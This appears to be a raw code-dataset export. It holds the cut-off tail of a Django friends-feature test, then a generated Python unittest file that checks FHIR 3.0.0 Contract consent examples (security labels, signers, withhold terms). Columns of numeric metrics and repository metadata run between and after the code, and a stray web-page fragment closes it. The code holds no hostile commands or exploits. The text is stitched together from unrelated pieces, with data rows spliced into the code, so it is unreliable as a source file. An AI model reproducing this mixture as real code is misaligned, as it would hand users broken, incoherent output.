client.login(username=self.user2.username, password=self.password)
response = client.post(reverse('friends:my_friends'), {'action': 'accept', 'user_id': self.user1.id})
self.assertEqual(response.status_code, 200)
self.assertEqual(response.json()['relationship_status'], RELATIONSHIP_FRIENDS)
self.user1.refresh_from_db()
self.user2.refresh_from_db()
self.assertEqual(self.user1.check_relationship(self.user2), RELATIONSHIP_FRIENDS)
self.assertEqual(self.user2.check_relationship(self.user1), RELATIONSHIP_FRIENDS)
self.assertEqual(self.user1.get_friends()[0].username, self.user2.username)
self.assertEqual(self.user2.get_friends()[0].username, self.user1.username)
def test_remove_from_friends(self):
client = Client()
client.login(username=self.user1.username, password=self.password)
response = client.post(reverse('friends:user_view', kwargs={'user_id': self.user2.id}), {'action': 'add'})
self.assertEqual(response.status_code, 200)
self.user1.refresh_from_db()
self.user2.refresh_from_db()
self.assertEqual(self.user1.check_relationship(self.user2), RELATIONSHIP_REQUEST_HAS_SENT)
self.assertEqual(self.user2.check_relationship(self.user1), RELATIONSHIP_WAITING_FOR_ACCEPT)
client.login(username=self.user2.username, password=self.password)
response = client.post(reverse('friends:my_friends'), {'action': 'accept', 'user_id': self.user1.id})
self.assertEqual(response.status_code, 200)
self.assertEqual(response.json()['relationship_status'], RELATIONSHIP_FRIENDS)
self.user1.refresh_from_db()
self.user2.refresh_from_db()
self.assertEqual(self.user1.check_relationship(self.user2), RELATIONSHIP_FRIENDS)
self.assertEqual(self.user2.check_relationship(self.user1), RELATIONSHIP_FRIENDS)
response = client.post(reverse('friends:my_friends'), {'action': 'cancel', 'user_id': self.user1.id})
self.assertEqual(response.status_code, 200)
self.assertEqual(response.json()['relationship_status'], NO_RELATIONSHIP)
self.user1.refresh_from_db()
self.user2.refresh_from_db()
self.assertEqual(self.user1.check_relationship(self.user2), NO_RELATIONSHIP)
self.assertEqual(self.user2.check_relationship(self.user1), NO_RELATIONSHIP)
| 50.604478
| 114
| 0.725262
| 830
| 6,781
| 5.693976
| 0.084337
| 0.083792
| 0.088447
| 0.071942
| 0.922556
| 0.884046
| 0.884046
| 0.876217
| 0.85548
| 0.85548
| 0
| 0.024365
| 0.152632
| 6,781
| 133
| 115
| 50.984962
| 0.79812
| 0
| 0
| 0.76699
| 0
| 0
| 0.071081
| 0
| 0
| 0
| 0
| 0
| 0.368932
| 1
| 0.058252
| false
| 0.106796
| 0.058252
| 0
| 0.135922
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
38cfd3cf8a791a1eec5bb4e14ccb125df8439b3a
| 16,331
|
py
|
Python
|
rdr_service/lib_fhir/fhirclient_3_0_0/models/contract_tests.py
|
all-of-us/raw-data-repository
|
d28ad957557587b03ff9c63d55dd55e0508f91d8
|
[
"BSD-3-Clause"
] | 39
|
2017-10-13T19:16:27.000Z
|
2021-09-24T16:58:21.000Z
|
rdr_service/lib_fhir/fhirclient_3_0_0/models/contract_tests.py
|
all-of-us/raw-data-repository
|
d28ad957557587b03ff9c63d55dd55e0508f91d8
|
[
"BSD-3-Clause"
] | 312
|
2017-09-08T15:42:13.000Z
|
2022-03-23T18:21:40.000Z
|
rdr_service/lib_fhir/fhirclient_3_0_0/models/contract_tests.py
|
all-of-us/raw-data-repository
|
d28ad957557587b03ff9c63d55dd55e0508f91d8
|
[
"BSD-3-Clause"
] | 19
|
2017-09-15T13:58:00.000Z
|
2022-02-07T18:33:20.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Generated from FHIR 3.0.0.11832 on 2017-03-22.
# 2017, SMART Health IT.
import io
import json
import os
import unittest
from . import contract
from .fhirdate import FHIRDate
class ContractTests(unittest.TestCase):
def instantiate_from(self, filename):
datadir = os.environ.get('FHIR_UNITTEST_DATADIR') or ''
with io.open(os.path.join(datadir, filename), 'r', encoding='utf-8') as handle:
js = json.load(handle)
self.assertEqual("Contract", js["resourceType"])
return contract.Contract(js)
def testContract1(self):
inst = self.instantiate_from("contract-example-42cfr-part2.json")
self.assertIsNotNone(inst, "Must have instantiated a Contract instance")
self.implContract1(inst)
js = inst.as_json()
self.assertEqual("Contract", js["resourceType"])
inst2 = contract.Contract(js)
self.implContract1(inst2)
def implContract1(self, inst):
self.assertEqual(inst.agent[0].role[0].coding[0].code, "IR")
self.assertEqual(inst.agent[0].role[0].coding[0].display, "Recipient")
self.assertEqual(inst.agent[0].role[0].coding[0].system, "http://org.mdhhs.fhir.consent-actor-type")
self.assertEqual(inst.agent[0].role[0].text, "Recipient of restricted health information")
self.assertEqual(inst.agent[1].role[0].coding[0].code, "IS")
self.assertEqual(inst.agent[1].role[0].coding[0].display, "Sender")
self.assertEqual(inst.agent[1].role[0].coding[0].system, "http://org.mdhhs.fhir.consent-actor-type")
self.assertEqual(inst.agent[1].role[0].text, "Sender of restricted health information")
self.assertEqual(inst.id, "C-2121")
self.assertEqual(inst.issued.date, FHIRDate("2031-11-01T21:18:27-04:00").date)
self.assertEqual(inst.issued.as_json(), "2031-11-01T21:18:27-04:00")
self.assertEqual(inst.legal[0].contentAttachment.contentType, "application/pdf")
self.assertEqual(inst.legal[0].contentAttachment.language, "en-US")
self.assertEqual(inst.legal[0].contentAttachment.title, "MDHHS-5515 Consent To Share Your Health Information")
self.assertEqual(inst.legal[0].contentAttachment.url, "http://org.mihin.ecms/ConsentDirective-2121")
self.assertEqual(inst.meta.lastUpdated.date, FHIRDate("2016-07-19T18:18:42.108-04:00").date)
self.assertEqual(inst.meta.lastUpdated.as_json(), "2016-07-19T18:18:42.108-04:00")
self.assertEqual(inst.meta.versionId, "1")
self.assertEqual(inst.securityLabel[0].code, "R")
self.assertEqual(inst.securityLabel[0].display, "Restricted")
self.assertEqual(inst.securityLabel[0].system, "http://hl7.org/fhir/v3/Confidentiality")
self.assertEqual(inst.securityLabel[1].code, "ETH")
self.assertEqual(inst.securityLabel[1].display, "substance abuse information sensitivity")
self.assertEqual(inst.securityLabel[1].system, "http://hl7.org/fhir/v3/ActCode")
self.assertEqual(inst.securityLabel[2].code, "42CFRPart2")
self.assertEqual(inst.securityLabel[2].system, "http://hl7.org/fhir/v3/ActCode")
self.assertEqual(inst.securityLabel[3].code, "TREAT")
self.assertEqual(inst.securityLabel[3].display, "treatment")
self.assertEqual(inst.securityLabel[3].system, "http://hl7.org/fhir/v3/ActReason")
self.assertEqual(inst.securityLabel[4].code, "HPAYMT")
self.assertEqual(inst.securityLabel[4].display, "healthcare payment")
self.assertEqual(inst.securityLabel[4].system, "http://hl7.org/fhir/v3/ActReason")
self.assertEqual(inst.securityLabel[5].code, "HOPERAT")
self.assertEqual(inst.securityLabel[5].display, "healthcare operations")
self.assertEqual(inst.securityLabel[5].system, "http://hl7.org/fhir/v3/ActReason")
self.assertEqual(inst.securityLabel[6].code, "PERSISTLABEL")
self.assertEqual(inst.securityLabel[6].display, "persist security label")
self.assertEqual(inst.securityLabel[6].system, "http://hl7.org/fhir/v3/ActCode")
self.assertEqual(inst.securityLabel[7].code, "PRIVMARK")
self.assertEqual(inst.securityLabel[7].display, "privacy mark")
self.assertEqual(inst.securityLabel[7].system, "http://hl7.org/fhir/v3/ActCode")
self.assertEqual(inst.securityLabel[8].code, "NORDSCLCD")
self.assertEqual(inst.securityLabel[8].display, "no redisclosure without consent directive")
self.assertEqual(inst.securityLabel[8].system, "http://hl7.org/fhir/v3/ActCode")
self.assertEqual(inst.signer[0].signature[0].type[0].code, "1.2.840.10065.1.12.1.1")
self.assertEqual(inst.signer[0].signature[0].type[0].system, "urn:iso-astm:E1762-95:2013")
self.assertEqual(inst.signer[0].signature[0].when.date, FHIRDate("2017-02-08T10:57:34+01:00").date)
self.assertEqual(inst.signer[0].signature[0].when.as_json(), "2017-02-08T10:57:34+01:00")
self.assertEqual(inst.signer[0].type.code, "SELF")
self.assertEqual(inst.signer[0].type.system, "http://org.mdhhs.fhir.consent-signer-type")
self.assertEqual(inst.subType[0].coding[0].code, "MDHHS-5515")
self.assertEqual(inst.subType[0].coding[0].display, "Michigan MDHHS-5515 Consent to Share Behavioral Health Information for Care Coordination Purposes")
self.assertEqual(inst.subType[0].coding[0].system, "http://hl7.org/fhir/consentcategorycodes")
self.assertEqual(inst.text.status, "generated")
self.assertEqual(inst.type.coding[0].code, "OPTIN")
self.assertEqual(inst.type.coding[0].system, "http://org.mdhhs.fhir.consentdirective-type")
self.assertEqual(inst.type.text, "Opt-in consent directive")
def testContract2(self):
inst = self.instantiate_from("contract-example.json")
self.assertIsNotNone(inst, "Must have instantiated a Contract instance")
self.implContract2(inst)
js = inst.as_json()
self.assertEqual("Contract", js["resourceType"])
inst2 = contract.Contract(js)
self.implContract2(inst2)
def implContract2(self, inst):
self.assertEqual(inst.id, "C-123")
self.assertEqual(inst.identifier.system, "http://happyvalley.com/contract")
self.assertEqual(inst.identifier.value, "12347")
self.assertEqual(inst.text.div, "<div xmlns=\"http://www.w3.org/1999/xhtml\">A human-readable rendering of the contract</div>")
self.assertEqual(inst.text.status, "generated")
def testContract3(self):
inst = self.instantiate_from("pcd-example-notAuthor.json")
self.assertIsNotNone(inst, "Must have instantiated a Contract instance")
self.implContract3(inst)
js = inst.as_json()
self.assertEqual("Contract", js["resourceType"])
inst2 = contract.Contract(js)
self.implContract3(inst2)
def implContract3(self, inst):
self.assertEqual(inst.friendly[0].contentAttachment.title, "The terms of the consent in friendly consumer speak.")
self.assertEqual(inst.id, "pcd-example-notAuthor")
self.assertEqual(inst.issued.date, FHIRDate("2015-11-18").date)
self.assertEqual(inst.issued.as_json(), "2015-11-18")
self.assertEqual(inst.legal[0].contentAttachment.title, "The terms of the consent in lawyer speak.")
self.assertEqual(inst.subType[0].coding[0].code, "Opt-In")
self.assertEqual(inst.subType[0].coding[0].display, "Default Authorization with exceptions.")
self.assertEqual(inst.subType[0].coding[0].system, "http://www.infoway-inforoute.ca.org/Consent-subtype-codes")
self.assertEqual(inst.term[0].text, "Withhold all data authored by Good Health provider.")
self.assertEqual(inst.term[0].type.coding[0].code, "withhold-authored-by")
self.assertEqual(inst.term[0].type.coding[0].display, "Withhold all data authored by specified actor entity.")
self.assertEqual(inst.term[0].type.coding[0].system, "http://example.org/fhir/consent-term-type-codes")
self.assertEqual(inst.text.status, "generated")
self.assertEqual(inst.type.coding[0].code, "57016-8")
self.assertEqual(inst.type.coding[0].system, "http://loinc.org")
def testContract4(self):
inst = self.instantiate_from("pcd-example-notLabs.json")
self.assertIsNotNone(inst, "Must have instantiated a Contract instance")
self.implContract4(inst)
js = inst.as_json()
self.assertEqual("Contract", js["resourceType"])
inst2 = contract.Contract(js)
self.implContract4(inst2)
def implContract4(self, inst):
self.assertEqual(inst.friendly[0].contentAttachment.title, "The terms of the consent in friendly consumer speak.")
self.assertEqual(inst.id, "pcd-example-notLabs")
self.assertEqual(inst.issued.date, FHIRDate("2014-08-17").date)
self.assertEqual(inst.issued.as_json(), "2014-08-17")
self.assertEqual(inst.legal[0].contentAttachment.title, "The terms of the consent in lawyer speak.")
self.assertEqual(inst.subType[0].coding[0].code, "Opt-In")
self.assertEqual(inst.subType[0].coding[0].display, "Default Authorization with exceptions.")
self.assertEqual(inst.subType[0].coding[0].system, "http://www.infoway-inforoute.ca.org/Consent-subtype-codes")
self.assertEqual(inst.term[0].subType.coding[0].code, "ProcedureRequest")
self.assertEqual(inst.term[0].subType.coding[0].system, "http://hl7.org/fhir/resource-types")
self.assertEqual(inst.term[0].text, "Withhold orders from any provider.")
self.assertEqual(inst.term[0].type.coding[0].code, "withhold-object-type")
self.assertEqual(inst.term[0].type.coding[0].system, "http://example.org/fhir/consent-term-type-codes")
self.assertEqual(inst.term[1].subType.coding[0].code, "DiagnosticReport")
self.assertEqual(inst.term[1].subType.coding[0].system, "http://hl7.org/fhir/resource-types")
self.assertEqual(inst.term[1].text, "Withhold order results from any provider.")
self.assertEqual(inst.term[1].type.coding[0].code, "withhold-object-type")
self.assertEqual(inst.term[1].type.coding[0].system, "http://example.org/fhir/consent-term-type-codes")
self.assertEqual(inst.text.status, "generated")
self.assertEqual(inst.type.coding[0].code, "57016-8")
self.assertEqual(inst.type.coding[0].system, "http://loinc.org")
def testContract5(self):
inst = self.instantiate_from("pcd-example-notOrg.json")
self.assertIsNotNone(inst, "Must have instantiated a Contract instance")
self.implContract5(inst)
js = inst.as_json()
self.assertEqual("Contract", js["resourceType"])
inst2 = contract.Contract(js)
self.implContract5(inst2)
def implContract5(self, inst):
self.assertEqual(inst.friendly[0].contentAttachment.title, "The terms of the consent in friendly consumer speak.")
self.assertEqual(inst.id, "pcd-example-notOrg")
self.assertEqual(inst.issued.date, FHIRDate("2015-11-18").date)
self.assertEqual(inst.issued.as_json(), "2015-11-18")
self.assertEqual(inst.legal[0].contentAttachment.title, "The terms of the consent in lawyer speak.")
self.assertEqual(inst.subType[0].coding[0].code, "Opt-In")
self.assertEqual(inst.subType[0].coding[0].display, "Default Authorization with exceptions.")
self.assertEqual(inst.subType[0].coding[0].system, "http://www.infoway-inforoute.ca.org/Consent-subtype-codes")
self.assertEqual(inst.term[0].text, "Withhold this order and any results or related objects from any provider.")
self.assertEqual(inst.term[0].type.coding[0].code, "withhold-from")
self.assertEqual(inst.term[0].type.coding[0].display, "Withhold all data from specified actor entity.")
self.assertEqual(inst.term[0].type.coding[0].system, "http://example.org/fhir/consent-term-type-codes")
self.assertEqual(inst.text.status, "generated")
self.assertEqual(inst.type.coding[0].code, "57016-8")
self.assertEqual(inst.type.coding[0].system, "http://loinc.org")
def testContract6(self):
inst = self.instantiate_from("pcd-example-notThem.json")
self.assertIsNotNone(inst, "Must have instantiated a Contract instance")
self.implContract6(inst)
js = inst.as_json()
self.assertEqual("Contract", js["resourceType"])
inst2 = contract.Contract(js)
self.implContract6(inst2)
def implContract6(self, inst):
self.assertEqual(inst.friendly[0].contentAttachment.title, "The terms of the consent in friendly consumer speak.")
self.assertEqual(inst.id, "pcd-example-notThem")
self.assertEqual(inst.issued.date, FHIRDate("2015-11-18").date)
self.assertEqual(inst.issued.as_json(), "2015-11-18")
self.assertEqual(inst.legal[0].contentAttachment.title, "The terms of the consent in lawyer speak.")
self.assertEqual(inst.signer[0].signature[0].type[0].code, "1.2.840.10065.1.12.1.1")
self.assertEqual(inst.signer[0].signature[0].type[0].system, "urn:iso-astm:E1762-95:2013")
self.assertEqual(inst.signer[0].signature[0].when.date, FHIRDate("2013-06-08T10:57:34-07:00").date)
self.assertEqual(inst.signer[0].signature[0].when.as_json(), "2013-06-08T10:57:34-07:00")
self.assertEqual(inst.signer[0].type.code, "COVPTY")
self.assertEqual(inst.signer[0].type.system, "http://www.hl7.org/fhir/contractsignertypecodes")
self.assertEqual(inst.subType[0].coding[0].code, "Opt-In")
self.assertEqual(inst.subType[0].coding[0].display, "Default Authorization with exceptions.")
self.assertEqual(inst.subType[0].coding[0].system, "http://www.infoway-inforoute.ca.org/Consent-subtype-codes")
self.assertEqual(inst.term[0].text, "Withhold this order and any results or related objects from specified nurse provider.")
self.assertEqual(inst.term[0].type.coding[0].code, "withhold-from")
self.assertEqual(inst.term[0].type.coding[0].display, "Withhold all data from specified actor entity.")
self.assertEqual(inst.term[0].type.coding[0].system, "http://example.org/fhir/consent-term-type-codes")
self.assertEqual(inst.text.status, "generated")
self.assertEqual(inst.type.coding[0].code, "57016-8")
self.assertEqual(inst.type.coding[0].system, "http://loinc.org")
def testContract7(self):
inst = self.instantiate_from("pcd-example-notThis.json")
self.assertIsNotNone(inst, "Must have instantiated a Contract instance")
self.implContract7(inst)
js = inst.as_json()
self.assertEqual("Contract", js["resourceType"])
inst2 = contract.Contract(js)
self.implContract7(inst2)
def implContract7(self, inst):
self.assertEqual(inst.friendly[0].contentAttachment.title, "The terms of the consent in friendly consumer speak.")
self.assertEqual(inst.id, "pcd-example-notThis")
self.assertEqual(inst.issued.date, FHIRDate("2015-11-18").date)
self.assertEqual(inst.issued.as_json(), "2015-11-18")
self.assertEqual(inst.legal[0].contentAttachment.title, "The terms of the consent in lawyer speak.")
self.assertEqual(inst.subType[0].coding[0].code, "Opt-In")
self.assertEqual(inst.subType[0].coding[0].display, "Default Authorization with exceptions.")
self.assertEqual(inst.subType[0].coding[0].system, "http://www.infoway-inforoute.ca.org/Consent-subtype-codes")
self.assertEqual(inst.term[0].text, "Withhold this order and any results or related objects from any provider.")
self.assertEqual(inst.term[0].type.coding[0].code, "withhold-identified-object-and-related")
self.assertEqual(inst.term[0].type.coding[0].display, "Withhold the identified object and any other resources that are related to this object.")
self.assertEqual(inst.term[0].type.coding[0].system, "http://example.org/fhir/consent-term-type-codes")
self.assertEqual(inst.text.status, "generated")
self.assertEqual(inst.type.coding[0].code, "57016-8")
self.assertEqual(inst.type.coding[0].system, "http://loinc.org")
| 63.29845
| 160
| 0.692915
| 2,143
| 16,331
| 5.268315
| 0.125525
| 0.208592
| 0.250753
| 0.073694
| 0.824092
| 0.745084
| 0.718246
| 0.662356
| 0.625066
| 0.603632
| 0
| 0.044444
| 0.151307
| 16,331
| 257
| 161
| 63.544747
| 0.77013
| 0.006981
| 0
| 0.417778
| 1
| 0
| 0.285979
| 0.034483
| 0
| 0
| 0
| 0
| 0.728889
| 1
| 0.066667
| false
| 0
| 0.026667
| 0
| 0.102222
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.